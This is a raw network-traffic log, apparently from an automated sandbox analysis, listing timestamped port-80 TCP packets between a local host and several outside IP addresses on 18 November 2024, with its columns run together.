                                                                                                                                Nov 18, 2024 16:26:37.046708107 CET804999947.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:37.047005892 CET4999980192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:37.342174053 CET4999980192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:38.375408888 CET5000080192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:38.380398035 CET805000047.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:38.381160021 CET5000080192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:38.408535004 CET5000080192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:38.413753986 CET805000047.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:39.918813944 CET5000080192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:39.924563885 CET805000047.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:39.924788952 CET5000080192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:41.043857098 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:41.049232006 CET805000147.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:41.050115108 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:41.103332996 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:41.111016035 CET805000147.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:41.111097097 CET805000147.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:42.027108908 CET805000147.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:42.075012922 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:42.229032993 CET805000147.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:42.229103088 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:42.606571913 CET5000180192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.625322104 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.631087065 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:43.631191969 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.638916016 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.644586086 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.607912064 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.788152933 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.793886900 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.794193983 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.797152042 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.802278996 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:49.862319946 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.867492914 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:49.867593050 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.877959967 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.883074999 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:51.387584925 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:51.393429995 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:51.393496990 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.408365965 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.413625956 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:52.420370102 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.428956985 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.434062004 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:53.934617996 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:53.940350056 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:53.950443029 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.954363108 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.959341049 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:54.959420919 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.973051071 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.978463888 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:54.979538918 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:56.481405020 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:56.487224102 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:56.487301111 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.500288963 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.506026030 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:57.509270906 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.513317108 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.519217014 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.802262068 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.856288910 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.923259974 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.923423052 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.926404953 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.931329966 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.033452034 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.038501024 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.038595915 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.050431013 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.055483103 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.856203079 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.903307915 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.965643883 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.966367006 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:06.559721947 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.580571890 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.585827112 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:07.592295885 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.600482941 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.605705976 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.412798882 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.520956993 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.521017075 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:09.106441975 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.125317097 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.130409956 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.134506941 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.146294117 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.151154041 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.152239084 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.955631971 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:11.028196096 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:11.064963102 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:11.065030098 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:11.678343058 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.708012104 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.712985039 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:12.713088036 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.724095106 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.729088068 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519913912 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519984961 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519999027 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.520168066 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.628834963 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.631386995 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.631386995 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.636233091 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:18.662339926 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.669598103 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:18.669694901 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.693389893 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.698785067 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:20.200161934 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:20.249994993 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:21.219321966 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.224498987 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:21.224591970 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.234764099 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.239928961 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:22.750330925 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:22.758256912 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:22.758316040 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.765769958 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.771049023 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:23.774416924 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.786346912 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.791425943 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:23.791655064 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:24.408828020 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:24.408987999 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:25.293922901 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:25.298855066 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.314430952 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.319395065 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.322438955 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.330338955 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.330630064 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.334422112 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.335305929 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963671923 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963711023 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963742018 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963879108 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.964231968 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.964373112 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.964639902 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.964817047 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.966927052 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.973272085 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.004089117 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.009422064 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.009497881 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.021816015 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.026786089 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.705888033 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.706718922 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:34.528711081 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:34.535698891 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:35.547231913 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:35.552491903 CET80500173.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:35.552690029 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:35.564790964 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:35.569953918 CET80500173.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:36.187437057 CET80500173.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:36.187572002 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:37.075189114 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:37.080194950 CET80500173.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:38.094108105 CET5001880192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:38.099071980 CET80500183.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:38.101032972 CET5001880192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:38.110781908 CET5001880192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:38.116832018 CET80500183.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:38.117182970 CET80500183.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:38.859934092 CET80500183.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:38.859992981 CET5001880192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:39.637700081 CET5001880192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:39.643358946 CET80500183.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:40.672327995 CET5001980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:40.677561998 CET80500193.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:40.677640915 CET5001980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:40.694086075 CET5001980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:40.699738979 CET80500193.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:41.341345072 CET80500193.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:41.372927904 CET80500193.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:41.373043060 CET5001980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:41.374162912 CET5001980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:41.378998995 CET80500193.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:47.040698051 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:47.045716047 CET805002047.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:47.045922041 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:47.055669069 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:47.060710907 CET805002047.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:48.014234066 CET805002047.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:48.075175047 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:48.201370955 CET805002047.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:48.202465057 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:48.562411070 CET5002080192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:49.578478098 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:49.583679914 CET805002147.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:49.583904028 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:49.596662998 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:49.602150917 CET805002147.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:50.615485907 CET805002147.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:50.659358978 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:50.785408020 CET805002147.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:50.785459042 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:51.107563972 CET5002180192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:52.126424074 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:52.131932974 CET805002247.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:52.132072926 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:52.142779112 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:52.147844076 CET805002247.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:52.148030043 CET805002247.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:53.119647980 CET805002247.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:53.168960094 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:53.310903072 CET805002247.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:53.310992002 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:53.658430099 CET5002280192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:54.678687096 CET5002380192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:54.684601068 CET805002347.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:54.684694052 CET5002380192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:54.705920935 CET5002380192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:54.711175919 CET805002347.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:55.661092997 CET805002347.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:55.853193998 CET805002347.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:55.854624987 CET5002380192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:55.858529091 CET5002380192.168.2.647.52.221.8
                                                                                                                                Nov 18, 2024 16:27:55.863842964 CET805002347.52.221.8192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:00.981836081 CET5002480192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:00.986747026 CET805002423.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:00.986912012 CET5002480192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:00.999463081 CET5002480192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:01.004355907 CET805002423.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:01.817152977 CET805002423.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:01.921971083 CET805002423.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:01.922077894 CET5002480192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:02.530184031 CET5002480192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:03.547157049 CET5002580192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:03.552330017 CET805002523.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:03.552536964 CET5002580192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:03.562640905 CET5002580192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:03.567606926 CET805002523.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:04.352308989 CET805002523.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:04.457537889 CET805002523.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:04.458522081 CET5002580192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:05.075278997 CET5002580192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:06.093936920 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:06.100630045 CET805002623.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:06.100809097 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:06.112718105 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:06.117640018 CET805002623.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:06.117794991 CET805002623.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:06.896404982 CET805002623.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:06.965869904 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:07.001986980 CET805002623.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:07.002048016 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:07.622271061 CET5002680192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:08.644032001 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:08.649159908 CET805002723.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:08.649890900 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:08.657624006 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:08.662605047 CET805002723.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:09.497873068 CET805002723.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:09.543987989 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:09.603418112 CET805002723.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:09.603674889 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:09.604445934 CET5002780192.168.2.623.106.59.18
                                                                                                                                Nov 18, 2024 16:28:09.609317064 CET805002723.106.59.18192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:23.317763090 CET5002880192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:23.323091984 CET8050028208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:23.323163986 CET5002880192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:23.337167025 CET5002880192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:23.341973066 CET8050028208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:23.921468973 CET8050028208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:23.926522017 CET5002880192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:24.841034889 CET5002880192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:24.846175909 CET8050028208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:25.862611055 CET5002980192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:25.867538929 CET8050029208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:25.874919891 CET5002980192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:25.882528067 CET5002980192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:25.888008118 CET8050029208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:26.508647919 CET8050029208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:26.508963108 CET5002980192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:27.388691902 CET5002980192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:27.394294024 CET8050029208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:28.406774044 CET5003080192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:28.411803007 CET8050030208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:28.414391994 CET5003080192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:28.424783945 CET5003080192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:28.429889917 CET8050030208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:28.430236101 CET8050030208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:29.012497902 CET8050030208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:29.012564898 CET5003080192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:29.934818983 CET5003080192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:29.941368103 CET8050030208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:30.954135895 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:30.959481955 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:30.959566116 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:30.968291044 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:30.973325014 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238030910 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238092899 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238128901 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238163948 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238198996 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238229036 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.238233089 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238269091 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.238284111 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.238298893 CET8050031208.91.197.27192.168.2.6
